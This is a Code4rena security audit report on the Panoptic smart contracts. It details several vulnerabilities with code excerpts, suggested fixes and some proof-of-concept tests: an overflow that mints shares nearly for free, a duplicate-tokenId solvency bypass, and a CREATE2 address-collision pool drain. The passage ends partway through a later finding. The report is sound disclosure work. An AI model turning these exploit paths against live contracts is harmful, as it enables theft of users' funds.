sponsor | slug | date | title | findings | contest |
---|---|---|---|---|---|
Panoptic | 2024-04-panoptic | 2024-05-⭕ | Panoptic | | 354 |
Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.
A C4 audit is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.
During the audit outlined in this document, C4 conducted an analysis of the Panoptic smart contract system written in Solidity. The audit took place between April 1 and April 22, 2024.
60 Wardens contributed reports to Panoptic:
- 0xLogos
- bin2chen
- KupiaSec
- rbserver
- Kalogerone
- 0xdice91
- pkqs90
- petro_1912
- Aymen0909
- 0xStalin
- DanielArmstrong
- Joshuajee
- JecikPo
- Udsen
- FastChecker
- DadeKuma
- Dup1337 (ChaseTheLight, sorrynotsorry, and deliriusz)
- Bauchibred
- sammy
- jesjupyter
- 99Crits
- favelanky
- cheatc0d3
- slvDev
- bareli
- Rolezn
- hihen
- ZanyBonzy
- albahaca
- radin100
- Naresh
- Vancelot
- grearlake
- d3e4
- zabihullahazadzoi
- John_Femi
- lanrebayode77
- jasonxiale
- satoshispeedrunner
- CodeWasp (slylandro_star, kuprum, audithare, and spaghetticode_sentinel)
- pfapostol
- Rhaydden
- blockchainbuttonmasher
- mining_mario
- twcctop
- 0xhacksmithh
- K42
- Topmark
- lsaudit
- lirezArAzAvi
- crc32
- codeslide
- oualidpro
- Sathish9098
- IllIllI
This audit was judged by Picodes.
Final report assembled by liveactionllama.
The C4 analysis yielded an aggregated total of 11 unique vulnerabilities. Of these vulnerabilities, 2 received a risk rating in the category of HIGH severity and 9 received a risk rating in the category of MEDIUM severity.
Additionally, C4 analysis included 43 reports detailing issues with a risk rating of LOW severity or non-critical.
All of the issues presented here are linked back to their original finding.
The code under review can be found within the C4 Panoptic repository, and is composed of 2 interfaces and 18 smart contracts written in the Solidity programming language and includes 4,921 lines of Solidity code.
C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.
High-level considerations for vulnerabilities span the following key areas when conducting assessments:
- Malicious Input Handling
- Escalation of privileges
- Arithmetic
- Gas use
For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.
Submitted by pkqs90, also found by bin2chen, Aymen0909, 0xStalin, JecikPo, and DanielArmstrong
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/PanopticPool.sol#L1621-L1640
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/CollateralTracker.sol#L1043-L1089
`settleLongPremium` is the function intended to settle premiums for long option holders. When called, it should deduct the premium from the option owner's account, but the current implementation adds the premium instead.
Let's look at the code for the premium calculation. We can see that `accumulatedPremium` and `s_options[owner][tokenId][legIndex]` are premium accumulators used to calculate the owed amount of premium, and that `accumulatedPremium` is a `LeftRightUnsigned` type, which means it must be positive. The `realizedPremia` is also positive, because it is calculated as `accumulatedPremium * liquidity`.
The issue occurs when calling `s_collateralToken.exercise()`. The `realizedPremia` passed in should be negative instead of positive, because negative means the user pays premia and positive means the user receives premia. The current implementation is incorrect.
PanopticPool.sol
accumulatedPremium = LeftRightUnsigned
.wrap(0)
.toRightSlot(premiumAccumulator0)
.toLeftSlot(premiumAccumulator1);
// update the premium accumulator for the long position to the latest value
// (the entire premia delta will be settled)
LeftRightUnsigned premiumAccumulatorsLast = s_options[owner][tokenId][legIndex];
s_options[owner][tokenId][legIndex] = accumulatedPremium;
> accumulatedPremium = accumulatedPremium.sub(premiumAccumulatorsLast);
}
uint256 liquidity = PanopticMath
.getLiquidityChunk(tokenId, legIndex, s_positionBalance[owner][tokenId].rightSlot())
.liquidity();
unchecked {
// update the realized premia
> LeftRightSigned realizedPremia = LeftRightSigned
> .wrap(0)
> .toRightSlot(int128(int256((accumulatedPremium.rightSlot() * liquidity) / 2 ** 64)))
> .toLeftSlot(int128(int256((accumulatedPremium.leftSlot() * liquidity) / 2 ** 64)));
// deduct the paid premium tokens from the owner's balance and add them to the cumulative settled token delta
s_collateralToken0.exercise(owner, 0, 0, 0, realizedPremia.rightSlot());
s_collateralToken1.exercise(owner, 0, 0, 0, realizedPremia.leftSlot());
CollateralTracker.sol
function exercise(
address optionOwner,
int128 longAmount,
int128 shortAmount,
int128 swappedAmount,
int128 realizedPremium
) external onlyPanopticPool returns (int128) {
unchecked {
// current available assets belonging to PLPs (updated after settlement) excluding any premium paid
int256 updatedAssets = int256(uint256(s_poolAssets)) - swappedAmount;
// add premium to be paid/collected on position close
> int256 tokenToPay = -realizedPremium;
// if burning ITM and swap occurred, compute tokens to be paid through exercise and add swap fees
int256 intrinsicValue = swappedAmount - (longAmount - shortAmount);
if ((intrinsicValue != 0) && ((shortAmount != 0) || (longAmount != 0))) {
// intrinsic value is the amount that need to be exchanged due to burning in-the-money
// add the intrinsic value to the tokenToPay
tokenToPay += intrinsicValue;
}
> if (tokenToPay > 0) {
// if user must pay tokens, burn them from user balance (revert if balance too small)
uint256 sharesToBurn = Math.mulDivRoundingUp(
uint256(tokenToPay),
totalSupply,
totalAssets()
);
_burn(optionOwner, sharesToBurn);
> } else if (tokenToPay < 0) {
// if user must receive tokens, mint them
uint256 sharesToMint = convertToShares(uint256(-tokenToPay));
_mint(optionOwner, sharesToMint);
}
We can also see this from the unit test `test_success_settleLongPremium`: the test checks that after calling `settleLongPremium`, the assets of `Buyers[0]` actually increase instead of decrease, which is obviously incorrect.
assetsBefore0 = ct0.convertToAssets(ct0.balanceOf(Buyers[0]));
assetsBefore1 = ct1.convertToAssets(ct1.balanceOf(Buyers[0]));
// collect buyer 1's three relevant chunks
for (uint256 i = 0; i < 3; ++i) {
pp.settleLongPremium(collateralIdLists[i], Buyers[0], 0);
}
assertEq(
ct0.convertToAssets(ct0.balanceOf(Buyers[0])) - assetsBefore0,
33_342,
"Incorrect Buyer 1 1st Collect 0"
);
Take the negative of `realizedPremia` before calling `s_collateralToken.exercise()`.
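A minimal sketch of this fix as a diff against the `PanopticPool.sol` snippet above (negating the `int128` slots is safe here, since the computed premium is far below `type(int128).max`):
- s_collateralToken0.exercise(owner, 0, 0, 0, realizedPremia.rightSlot());
- s_collateralToken1.exercise(owner, 0, 0, 0, realizedPremia.leftSlot());
+ // negate so the positive accumulated premium is debited from, not credited to, the owner
+ s_collateralToken0.exercise(owner, 0, 0, 0, -realizedPremia.rightSlot());
+ s_collateralToken1.exercise(owner, 0, 0, 0, -realizedPremia.leftSlot());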
dyedm1 (Panoptic) confirmed via duplicate issue #376
Keeping High severity as funds are at stake.
Submitted by 0xLogos
Malicious actors can mint huge amounts of shares for free and then withdraw all collateral.
In the `mint` function, the user-controlled `shares` parameter goes straight into the `previewMint` function, which calculates the required assets in an `unchecked` block. If the `shares` value is high enough, `shares * DECIMALS` overflows and `assets` will be very low.
function previewMint(uint shares) public view returns (uint assets) {
unchecked {
assets = Math.mulDivRoundingUp(
shares * DECIMALS, totalAssets(), totalSupply * (DECIMALS - COMMISSION_FEE)
);
}
}
function mint(uint shares, address receiver) external returns (uint assets) {
assets = previewMint(shares);
if (assets > type(uint104).max) revert Errors.DepositTooLarge();
...
}
Insert the following snippet into `CollateralTracker.t.sol` for a coded PoC:
function test_poc1(uint256 x) public {
_initWorld(x);
_grantTokens(Bob);
vm.startPrank(Bob);
uint shares = type(uint).max / 10000 + 1;
IERC20Partial(token0).approve(address(collateralToken0), type(uint256).max);
uint256 returnedAssets0 = collateralToken0.mint(shares, Bob);
assertEq(shares, collateralToken0.balanceOf(Bob));
assertEq(returnedAssets0, 1);
}
Remove the `unchecked` block so the multiplication in `previewMint` reverts on overflow.
function maxMint(address) external view returns (uint maxShares) {
return (convertToShares(type(uint104).max) * DECIMALS) / (DECIMALS + COMMISSION_FEE);
}
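A minimal sketch of that fix, mirroring the report's simplified snippet: with the `unchecked` block removed, Solidity >=0.8 checked arithmetic makes `shares * DECIMALS` revert on overflow instead of silently wrapping.
function previewMint(uint shares) public view returns (uint assets) {
    // checked arithmetic: an oversized `shares` now reverts here instead of wrapping
    assets = Math.mulDivRoundingUp(
        shares * DECIMALS, totalAssets(), totalSupply * (DECIMALS - COMMISSION_FEE)
    );
}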
Under/Overflow
[M-01] `PanopticFactory` uses spot price when deploying new pools, resulting in liquidity manipulation when minting
Submitted by DadeKuma, also found by sammy, Dup1337, Bauchibred, jesjupyter, and Vancelot
When `deployNewPool` is called, it uses the spot price of the pool, which can be manipulated through a flash loan and can thus return a highly inaccurate result. The price is used when deciding how much liquidity should be minted for each token, so this can result in an unbalanced pool. In other parts of the code this is not an issue, as oracles prevent price manipulation, but here there are no checks to prevent it.
The spot price is used to calculate the range liquidity for each token:
@> (uint160 currentSqrtPriceX96, , , , , , ) = v3Pool.slot0();
// For full range: L = Δx * sqrt(P) = Δy / sqrt(P)
// We start with fixed token amounts and apply this equation to calculate the liquidity
// Note that for pools with a tickSpacing that is not a power of 2 or greater than 8 (887272 % ts != 0),
// a position at the maximum and minimum allowable ticks will be wide, but not necessarily full-range.
// In this case, the `fullRangeLiquidity` will always be an underestimate in respect to the token amounts required to mint.
uint128 fullRangeLiquidity;
unchecked {
// Since we know one of the tokens is WETH, we simply add 0.1 ETH + worth in tokens
if (token0 == WETH) {
fullRangeLiquidity = uint128(
@> Math.mulDiv96RoundingUp(FULL_RANGE_LIQUIDITY_AMOUNT_WETH, currentSqrtPriceX96)
);
} else if (token1 == WETH) {
fullRangeLiquidity = uint128(
Math.mulDivRoundingUp(
FULL_RANGE_LIQUIDITY_AMOUNT_WETH,
Constants.FP96,
@> currentSqrtPriceX96
)
);
} else {
// Find the resulting liquidity for providing 1e6 of both tokens
uint128 liquidity0 = uint128(
@> Math.mulDiv96RoundingUp(FULL_RANGE_LIQUIDITY_AMOUNT_TOKEN, currentSqrtPriceX96)
);
uint128 liquidity1 = uint128(
Math.mulDivRoundingUp(
FULL_RANGE_LIQUIDITY_AMOUNT_TOKEN,
Constants.FP96,
@> currentSqrtPriceX96
)
);
// Pick the greater of the liquidities - i.e the more "expensive" option
// This ensures that the liquidity added is sufficiently large
fullRangeLiquidity = liquidity0 > liquidity1 ? liquidity0 : liquidity1;
}
}
But unlike other parts of the code, the `PanopticFactory` doesn't have any checks on the price (it uses neither oracles nor the TWAP), so the liquidity of each token can be manipulated through flash loans.
Consider using the TWAP price instead of the spot price.
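A hedged sketch of one approach, placed before the liquidity math in `deployNewPool` (here `twapFilter` stands in for the TWAP helper the protocol already uses for its oracle ticks, and `MAX_TWAP_DELTA_DEPLOYMENT` and the error name are illustrative assumptions):
(uint160 currentSqrtPriceX96, int24 spotTick, , , , , ) = v3Pool.slot0();
// compare the spot tick against a 10-minute TWAP and revert if it has been pushed too far
int24 twapTick = PanopticMath.twapFilter(v3Pool, 600);
if (Math.abs(int256(spotTick) - int256(twapTick)) > MAX_TWAP_DELTA_DEPLOYMENT)
    revert Errors.PriceBoundFail();
// alternatively, derive the liquidity amounts from Math.getSqrtRatioAtTick(twapTick)
// rather than from currentSqrtPriceX96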
Uniswap
dyedm1 (Panoptic) disputed and commented:
True, but I don't see negative consequences for this? This function is just a way to add some full-range liquidity to the pool so the entire range can be swapped across, and depending on the tokens we can add very small/large amounts of liquidity anyway (mentioned in the readme: Depending on the token, the amount of funds required for the initial factory deployment may be high or unrealistic)
@dyedm1 - assuming the deployer has infinite approvals, can't we imagine a scenario where, by manipulating the spot pool price, it ends up depositing way too many token1 and getting sandwiched leading to a significant loss?
Said differently, the risk is that currently the deployer has no control over the amount of token1 he will donate and this amount can be manipulated by an attacker.
Picodes (judge) decreased severity to Medium and commented:
This is at most Medium to me considering pool deployers are advanced users and you need to deploy a pool where the manipulation cost is low which should remain exceptional.
Yeah I agree this might be less than ideal if you have infinite approvals. Our UI doesn't do infinite approvals to the factory, but some wallets allow users to edit the approval amount before signing the transaction, so it might be prudent to add slippage checks here (to make the process idiot-proof).
[M-02] `_validatePositionList()` does not check for duplicate tokenIds, allowing attackers to bypass solvency checks
Submitted by pkqs90, also found by Udsen, 0xLogos, and bin2chen
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/PanopticPool.sol#L1367-L1391
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/PanopticPool.sol#L887-L893
The underlying issue is that `_validatePositionList()` does not check for duplicate tokenIds. Attackers can use this to bypass solvency checks, which leads to several impacts:
- Users can mint/burn/liquidate/forceExercise when they are insolvent.
- Users can settleLongPremium/forceExercise another user when the other user is insolvent.
This also conflicts with a main invariant stated in the audit readme: `Users should not be allowed to mint/burn options or pay premium if their end state is insolvent`.
First, let's see why `_validatePositionList` does not check for duplicate tokenIds. In a user's position hash, the first 8 bits store the length of the tokenIds list (an 8-bit counter that can overflow), and the last 248 bits store the XOR hash. XORing in the same tokenId hash an even number of times cancels out, and adding 256 to the 8-bit counter wraps it back to its original value, so we can simply add 256 tokenIds of the same kind to create a duplicate position hash.
For example: `Hash(key0, key1, key2) == Hash(key0, key1, key2, key0, key0, ..., 256 more key0)`. This way, we can add any tokenId we want while still arriving at the same position hash.
PanopticPool.sol
function _validatePositionList(
address account,
TokenId[] calldata positionIdList,
uint256 offset
) internal view {
uint256 pLength;
uint256 currentHash = s_positionsHash[account];
unchecked {
pLength = positionIdList.length - offset;
}
// note that if pLength == 0 even if a user has existing position(s) the below will fail b/c the fingerprints will mismatch
// Check that position hash (the fingerprint of option positions) matches the one stored for the '_account'
uint256 fingerprintIncomingList;
for (uint256 i = 0; i < pLength; ) {
> fingerprintIncomingList = PanopticMath.updatePositionsHash(
fingerprintIncomingList,
positionIdList[i],
ADD
);
unchecked {
++i;
}
}
// revert if fingerprint for provided '_positionIdList' does not match the one stored for the '_account'
if (fingerprintIncomingList != currentHash) revert Errors.InputListFail();
}
PanopticMath.sol
function updatePositionsHash(
uint256 existingHash,
TokenId tokenId,
bool addFlag
) internal pure returns (uint256) {
// add the XOR`ed hash of the single option position `tokenId` to the `existingHash`
// @dev 0 ^ x = x
unchecked {
// update hash by taking the XOR of the new tokenId
uint248 updatedHash = uint248(existingHash) ^
(uint248(uint256(keccak256(abi.encode(tokenId)))));
// increment the top 8 bit if addflag=true, decrement otherwise
return
addFlag
? uint256(updatedHash) + (((existingHash >> 248) + 1) << 248)
: uint256(updatedHash) + (((existingHash >> 248) - 1) << 248);
}
}
Then, let's see how duplicate ids can bypass the solvency check. The solvency check is in `_validateSolvency()`, which is called by all the user-interaction functions, such as mint/burn/liquidate/forceExercise/settleLongPremium. This function first validates the user-supplied `positionIdList` (which, as shown above, can include duplicates), then calls `_checkSolvencyAtTick()` to calculate the `balanceCross` (collateral balance) and `thresholdCross` (required collateral) for all tokens.
The key point is that the collateral balance includes the premium collected for each of the positions. For most positions, the collected premium is less than the collateral required to keep the position open. However, if a position has been open long enough, the fees it has accumulated may exceed the required collateral.
For this kind of position, we can duplicate it 256 times (or a multiple of 256 times, as long as there is enough gas) and make the collateral balance grow faster than the required collateral. This can make an insolvent account appear "solvent" by duplicating the key tokenId multiple times.
function _validateSolvency(
address user,
TokenId[] calldata positionIdList,
uint256 buffer
) internal view returns (uint256 medianData) {
// check that the provided positionIdList matches the positions in memory
> _validatePositionList(user, positionIdList, 0);
...
// Check the user's solvency at the fast tick; revert if not solvent
bool solventAtFast = _checkSolvencyAtTick(
user,
positionIdList,
currentTick,
fastOracleTick,
buffer
);
if (!solventAtFast) revert Errors.NotEnoughCollateral();
// If one of the ticks is too stale, we fall back to the more conservative tick, i.e, the user must be solvent at both the fast and slow oracle ticks.
if (Math.abs(int256(fastOracleTick) - slowOracleTick) > MAX_SLOW_FAST_DELTA)
if (!_checkSolvencyAtTick(user, positionIdList, currentTick, slowOracleTick, buffer))
revert Errors.NotEnoughCollateral();
}
function _checkSolvencyAtTick(
address account,
TokenId[] calldata positionIdList,
int24 currentTick,
int24 atTick,
uint256 buffer
) internal view returns (bool) {
(
LeftRightSigned portfolioPremium,
uint256[2][] memory positionBalanceArray
) = _calculateAccumulatedPremia(
account,
positionIdList,
COMPUTE_ALL_PREMIA,
ONLY_AVAILABLE_PREMIUM,
currentTick
);
LeftRightUnsigned tokenData0 = s_collateralToken0.getAccountMarginDetails(
account,
atTick,
positionBalanceArray,
portfolioPremium.rightSlot()
);
LeftRightUnsigned tokenData1 = s_collateralToken1.getAccountMarginDetails(
account,
atTick,
positionBalanceArray,
portfolioPremium.leftSlot()
);
(uint256 balanceCross, uint256 thresholdCross) = _getSolvencyBalances(
tokenData0,
tokenData1,
Math.getSqrtRatioAtTick(atTick)
);
// compare balance and required tokens, can use unsafe div because denominator is always nonzero
unchecked {
return balanceCross >= Math.unsafeDivRoundingUp(thresholdCross * buffer, 10_000);
}
}
CollateralTracker.sol
function getAccountMarginDetails(
address user,
int24 currentTick,
uint256[2][] memory positionBalanceArray,
int128 premiumAllPositions
) public view returns (LeftRightUnsigned tokenData) {
tokenData = _getAccountMargin(user, currentTick, positionBalanceArray, premiumAllPositions);
}
function _getAccountMargin(
address user,
int24 atTick,
uint256[2][] memory positionBalanceArray,
int128 premiumAllPositions
) internal view returns (LeftRightUnsigned tokenData) {
uint256 tokenRequired;
// if the account has active options, compute the required collateral to keep account in good health
if (positionBalanceArray.length > 0) {
// get all collateral required for the incoming list of positions
tokenRequired = _getTotalRequiredCollateral(atTick, positionBalanceArray);
// If premium is negative (ie. user has to pay for their purchased options), add this long premium to the token requirement
if (premiumAllPositions < 0) {
unchecked {
tokenRequired += uint128(-premiumAllPositions);
}
}
}
// if premium is positive (ie. user will receive funds due to selling options), add this premum to the user's balance
uint256 netBalance = convertToAssets(balanceOf[user]);
if (premiumAllPositions > 0) {
unchecked {
netBalance += uint256(uint128(premiumAllPositions));
}
}
// store assetBalance and tokens required in tokenData variable
tokenData = tokenData.toRightSlot(netBalance.toUint128()).toLeftSlot(
tokenRequired.toUint128()
);
return tokenData;
}
Now that we have shown how to bypass `_validateSolvency()`, all of the related checks can be bypassed. In this report, we only prove the core issue, that duplicate tokenIds are allowed, and do not craft complicated scenarios for the related impacts.
Add the following test code to `PanopticPool.t.sol`; it shows that passing 257 copies of the same tokenId still works for `mintOptions()`.
function test_duplicatePositionHash(
uint256 x,
uint256[2] memory widthSeeds,
int256[2] memory strikeSeeds,
uint256[2] memory positionSizeSeeds,
uint256 swapSizeSeed
) public {
_initPool(x);
(int24 width, int24 strike) = PositionUtils.getOTMSW(
widthSeeds[0],
strikeSeeds[0],
uint24(tickSpacing),
currentTick,
0
);
(int24 width2, int24 strike2) = PositionUtils.getOTMSW(
widthSeeds[1],
strikeSeeds[1],
uint24(tickSpacing),
currentTick,
0
);
vm.assume(width2 != width || strike2 != strike);
populatePositionData([width, width2], [strike, strike2], positionSizeSeeds);
// leg 1
TokenId tokenId = TokenId.wrap(0).addPoolId(poolId).addLeg(
0, 1, isWETH, 0, 0, 0, strike, width
);
TokenId[] memory posIdList = new TokenId[](257);
for (uint i = 0; i < 257; ++i) {
posIdList[i] = tokenId;
}
pp.mintOptions(posIdList, positionSizes[0], 0, 0, 0);
}
Add a check in `_validatePositionList` that the length is shorter than `MAX_POSITIONS` (32).
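A minimal sketch of the suggested check as a diff against `_validatePositionList` (`MAX_POSITIONS` is the protocol's existing 32-position limit):
  unchecked {
      pLength = positionIdList.length - offset;
  }
+ // a legitimate list can never exceed the position limit, so any list long
+ // enough to wrap the 8-bit counter (256+ entries) is rejected before hashing
+ if (pLength > MAX_POSITIONS) revert Errors.InputListFail();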
Invalid Validation
Picodes (judge) decreased severity to Medium and commented:
I don't think here "liquidation bots not liquidating the insolvent position during a period of time" is an external requirement considering how critical liquidations are to Panoptic. My reasoning is that even if the loss of funds is not "direct", being able to properly control when positions can be opened is a key feature, and the fact that you can "increase your leverage" while being insolvent prevents proper risk control.
However, it's true that this is not strictly speaking a scenario where "assets can be stolen/lost/compromised directly" so I'll downgrade to Med.
Note: for full discussion, please see the original submission.
Submitted by Kalogerone
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/PanopticFactory.sol#L237
(NOTE: This report is heavily inspired by this past valid report. The necessary changes have been made to suit the Panoptic protocol.)
The attack consists of two parts: finding a collision, and actually draining the pool. We describe both here:
Note that in `PanopticFactory::deployNewPool`, the `CREATE2` salt is user-supplied, and it is then passed to `Clones::cloneDeterministic`:
function deployNewPool(address token0, address token1, uint24 fee, bytes32 salt)
external
returns (PanopticPool newPoolContract)
{
// sort the tokens, if necessary:
(token0, token1) = token0 < token1 ? (token0, token1) : (token1, token0);
.
.
.
// This creates a new Panoptic Pool (proxy to the PanopticPool implementation)
// Users can specify a salt, the aim is to incentivize the mining of addresses with leading zeros
@> newPoolContract = PanopticPool(POOL_REFERENCE.cloneDeterministic(salt));
.
.
.
}
function cloneDeterministic(address implementation, bytes32 salt) internal returns (address instance) {
/// @solidity memory-safe-assembly
assembly {
// Cleans the upper 96 bits of the `implementation` word, then packs the first 3 bytes
// of the `implementation` address with the bytecode before the address.
mstore(0x00, or(shr(0xe8, shl(0x60, implementation)), 0x3d602d80600a3d3981f3363d3d373d3d3d363d73000000))
// Packs the remaining 17 bytes of `implementation` with the bytecode after the address.
mstore(0x20, or(shl(0x78, implementation), 0x5af43d82803e903d91602b57fd5bf3))
@> instance := create2(0, 0x09, 0x37, salt)
}
require(instance != address(0), "ERC1167: create2 failed");
}
The address collisions an attacker needs to find are:
- One undeployed Panoptic Pool address (1).
- An arbitrary attacker-controlled wallet contract (2).
Both sets of addresses can be brute-force searched because:
- As shown above, `salt` is a user-supplied parameter. By brute-forcing many `salt` values, we obtain many different (undeployed) pool addresses for (1). The user can know the address of a Panoptic Pool before deploying it since, as shown in the code snippet above, the result is deterministic.
- (2) can be searched the same way. The contract just has to be deployed using `CREATE2`, and the `salt` is in the attacker's control by definition.
An attacker can find a single address collision between (1) and (2) with a high probability of success using the following meet-in-the-middle technique, a classic brute-force-based attack in cryptography:
- Brute-force a sufficient number of `salt` values (`2^80`), pre-compute the resulting account addresses, and store them efficiently, e.g. in a Bloom filter data structure.
- Brute-force contract pre-computation to find a collision with any address within the set stored in step 1.
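To see why `2^80` is the right order of magnitude: with `2^80` stored pool addresses and `2^80` probed wallet addresses drawn from a 160-bit address space, the expected number of collisions is roughly `2^80 * 2^80 / 2^160 = 1`, so the birthday bound makes a single collision likely.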
The feasibility, as well as the detailed technique and hardware requirements for finding a collision, are sufficiently described in multiple references:
- 1: A past issue on Sherlock describing this attack.
- 2: EIP-3607, whose rationale is this exact attack. The EIP is in Final state.
- 3: A blog post discussing the cost (money and time) of this exact attack.
The hashrate of the BTC network has reached `6.5 x 10^20` hashes per second as of the time of writing, which would take just about 31 minutes to perform `2^80` hashes. A fraction of this computing power will still easily find a collision in a reasonably short timeline.
Even given EIP-3607, which disables an EOA if a contract is already deployed on top of it, we show that it is still possible to drain the Panoptic Pool entirely given a contract collision.
Assuming the attacker has already found an address collision against an undeployed Panoptic Pool, call it `0xCOLLIDED`, the steps for completely draining the Panoptic Pool are as follows:
First tx:
- Deploy the attack contract onto address `0xCOLLIDED`.
- Set infinite allowance for {`0xCOLLIDED` ---> attacker wallet} for any token they want.
- Destroy the contract using `selfdestruct`.
Post-Dencun hardfork, `selfdestruct` is still possible if the contract was created in the same transaction. The only catch is that all three of these steps must be done in one tx.
The attacker now has complete control of any funds sent to `0xCOLLIDED`.
Second tx:
- Deploy the Panoptic Pool to `0xCOLLIDED`.
- Wait until the Panoptic Pool holds as many tokens as desired, then drain it.
The attacker has stolen all funds from the Panoptic Pool.
An address collision can cause all tokens of a Panoptic Pool to be drained.
While we cannot provide an actual hash collision due to infrastructural constraints, we are able to provide a coded PoC proving the following two properties of the EVM that would enable this attack:
- A contract can be deployed on top of an address that already had a contract before.
- By deploying a contract and self-destructing it in the same tx, we are able to set an allowance for an address that has no bytecode.
Here is the PoC, as well as detailed steps to recreate it:
- Paste the following file into Remix (or a development environment of choice): POC
- Deploy the contract `Test`.
- Run the function `Test.test()` with a salt of your choice, and record the returned address. The result will be:
  - `Test.getAllowance()` for that address will return exactly APPROVE_AMOUNT.
  - `Test.getCodeSize()` for that address will return exactly zero.
  - This proves the second property.
- Using the same salt as in step 3, run `Test.test()` again. The tx will go through, and the result will be:
  - `Test.test()` returns the same address as the first run.
  - `Test.getAllowance()` for that address will return twice APPROVE_AMOUNT.
  - `Test.getCodeSize()` for that address will still return zero.
  - This proves the first property.
The provided PoC has been tested on Remix IDE, on the Remix VM - Mainnet fork environment, as well as locally on a Holesky testnet fork which, as of the time of writing, has been upgraded with the Dencun hardfork.
Remix IDE
- Don't allow the user to control the `salt` used.
- Consider also encoding `block.timestamp` and `block.number` combined with the user's `salt`. Then an attacker who has successfully found a hash collision must execute the attack at a fixed block, and probably conspire with the sequencer, to ensure that the time is also fixed.
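A hedged sketch of the second suggestion as a diff against `deployNewPool` (the exact encoding is an illustrative assumption):
- newPoolContract = PanopticPool(POOL_REFERENCE.cloneDeterministic(salt));
+ // fold the caller and current block data into the salt so the final address
+ // cannot be fully precomputed offline during a collision search
+ bytes32 effectiveSalt = keccak256(abi.encode(msg.sender, salt, block.timestamp, block.number));
+ newPoolContract = PanopticPool(POOL_REFERENCE.cloneDeterministic(effectiveSalt));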
dyedm1 (Panoptic) acknowledged and commented:
Technically true, but the cost to do this is enormous (with a likely minimal return, given that deposits would first have to be solicited into that pool), and we can add safeguards on the frontend to prevent this kind of attack.
This report is worth Medium severity to me, considering:
- that the attacker could target any pool playing on the salt
- that the attacker can wait for enough deposits before draining the pool
So it fulfills "hypothetical attack path with stated assumptions, but external requirements".
Submitted by KupiaSec
Incorrect validation allows option buyers to avoid paying premium.
When a long leg is minted or a short leg is burnt, the protocol checks the liquidity spread by calculating `TotalLiquidity / NetLiquidity` and requires that it not exceed `9`. However, in the check function the validation is skipped when `NetLiquidity` is zero. This means that when a user mints a long leg that buys the entire selling amount, the liquidity spread is not checked.
This issue allows the option buyer not to pay premium, and here is why:
- When options are minted, the last accumulated premium is stored in `s_grossPremiumLast`. Refer to the `_updateSettlementPostMint` function of the `PanopticPool` contract.
- When options are burned, the new accumulated premium is fetched, and the premium is calculated by multiplying liquidity by the difference in accumulated premium. Refer to the `_updateSettlementPostBurn` function of the `PanopticPool` contract.
- However, when a long leg of T (total liquidity) amount is minted, N becomes zero.
- Later, when the minted long leg is burnt, premium values are not updated in the SFPM, because N is zero. Refer to SFPM:L1085.
Since there is no difference in the owed premium value, the option buyer will not pay the premium when burning the option.
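As a worked example: if sellers have provided `T = 1000` units of liquidity in a chunk and a buyer mints a long leg over the full 1000 units, the net liquidity `N` drops to zero. The spread check `T / N` is skipped on mint because `N == 0`, the SFPM skips the premium-accumulator update on burn for the same reason, and the buyer's owed-premium delta therefore comes out as zero.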
When checking the liquidity spread, the check should revert when N is zero and T is positive:
+ if(netLiquidity == 0 && totalLiquidity > 0) revert;
if(netLiquidity == 0) return;
Context
Submitted by petro_1912, also found by Joshuajee
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/CollateralTracker.sol#L247-L251
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/CollateralTracker.sol#L261-L263
The swap commission is paid on the intrinsic value based on `s_ITMSpreadFee` in the `CollateralTracker` contract. If `s_ITMSpreadFee` is zero, then no swap commission can be paid.
function startToken(
bool underlyingIsToken0,
address token0,
address token1,
uint24 fee,
PanopticPool panopticPool
) external {
__SNIP__
// cache the pool fee in basis points
uint24 _poolFee;
unchecked {
_poolFee = fee / 100; // @audit below fee 0.01%, then _poolFee = 0
}
s_poolFee = _poolFee;
...
__SNIP__
// Additional risk premium charged on intrinsic value of ITM positions
unchecked {
s_ITMSpreadFee = uint128((ITM_SPREAD_MULTIPLIER * _poolFee) / DECIMALS);
}
}
As the code snippet above shows, if `fee` (the Uniswap pool fee) is below 100, then `_poolFee` and `s_ITMSpreadFee` can be zero. Currently there are no pools on Uniswap V3 with a fee below 0.01%, but Uniswap fee levels can be adjusted by governance proposal, as happened in November 2021.
Here is the relevant mention from the Uniswap Protocol:
Uniswap v3 introduces multiple pools for each token pair, each with a different swapping fee. Liquidity providers may initially create pools at three fee levels: 0.05%, 0.30%, and 1%. More fee levels may be added by UNI governance, e.g. the 0.01% fee level added by this governance proposal in November 2021, as executed here.
https://dune.com/jcarnes/The-StableSwap-Wars
Given the competition between protocols like Uniswap and Carbon, more fee levels may be added in the future. Indeed, there are several discussions about lower fee levels for stablecoin pairs.
https://gov.bancor.network/t/custom-taker-fee-on-stable-to-stable-trades/4370
- Carbon has a protocol wide fee of 20 BP (basis points).
- This fee, while appropriate for volatile pairs - is not in line with the market when it comes to stable to stable trades.
- For reference, Uniswap added a 1 BP fee option (0.01%) - in November 2021 (link)
- This proposal seeks to take this one step further and introduce a fee of 0.001% on stable to stable trades. This is 1/10th of a single basis point.
If the pool fee is less than 100 (i.e., fee < 0.01%), then the PanopticPool's swap commission cannot be taken.
Use Uniswap's DECIMALS (1e6) instead of 10_000, and update all code related to DECIMALS.
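A hedged sketch of the change in `startToken`, assuming `DECIMALS` is redefined to Uniswap's native 1e6 fee scale and every consumer of `s_poolFee` is rescaled to match:
  uint24 _poolFee;
  unchecked {
-     _poolFee = fee / 100; // truncates a sub-0.01% fee level to zero
+     _poolFee = fee; // keep the fee in hundredths of a basis point (1e6 scale)
  }
  s_poolFee = _poolFee;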
Uniswap
This report shows how the current version of the protocol may not support all Uniswap V3 pools, whereas the sponsor's labels suggest supporting them was the intention, so Medium severity seems appropriate under "broken functionality".
Submitted by bin2chen
`s_grossPremiumLast[]` is defined as follows:
/// @dev Per-chunk `last` value that gives the aggregate amount of premium owed to all sellers when multiplied by the total amount of liquidity `totalLiquidity`
/// totalGrossPremium = totalLiquidity * (grossPremium(perLiquidityX64) - lastGrossPremium(perLiquidityX64)) / 2**64
